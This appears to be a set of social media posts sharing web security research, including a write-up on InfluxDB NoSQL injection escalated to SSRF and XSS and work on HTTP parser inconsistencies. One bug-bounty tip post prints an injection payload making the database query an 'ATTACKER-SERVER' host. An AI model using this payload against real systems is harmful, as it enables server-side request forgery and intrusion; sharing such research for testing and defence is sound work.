Check out the latest issue of BBRE Newsletter🔥 bbre.dev/59

Just published a post detailing how I developed an exploit for a NoSQL Injection for InfluxDB and how I escalated this issue into an SSRF and XSS: rafa.hashnode.dev/influxdb-nosql…

Exploiting HTTP Parsers Inconsistencies by Rafael da Costa Santos rafa.hashnode.dev/exploiting-htt… #BBRENewsletter59 Subscribe to get the next issue: bbre.dev/nl

#100DaysOfHacking Day 16: - Still bug hunting :D (Currently trying to bypass WAF for XSS) - Found a cool research about exploiting HTTP Parsers Inconsistencies rafa.hashnode.dev/exploiting-htt…

Articles worth reading discovered last week: 🗞 rafa.hashnode.dev/exploiting-htt… 🗞 labs.watchtowr.com/cve-2023-36844… 🗞 blog.isosceles.com/exploit-equiva… 🗞 pathonproject.com/zb/?a291b70fb1… #PentesterLabWeekly

Did you know that this is a valid payload for SSRF? ") |> yield(name: "1337") from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0) // example.com/?id=%22)%20%7c… Check out my post where I explain that: rafa.hashnode.dev/influxdb-nosql… #bugbountytips

My research (Exploiting HTTP Parsers Inconsistencies) now has a dedicated page on HackTricks! book.hacktricks.xyz/pentesting-web…

The results are in! We're proud to announce the Top 10 Web Hacking Techniques of 2023! portswigger.net/research/top-1…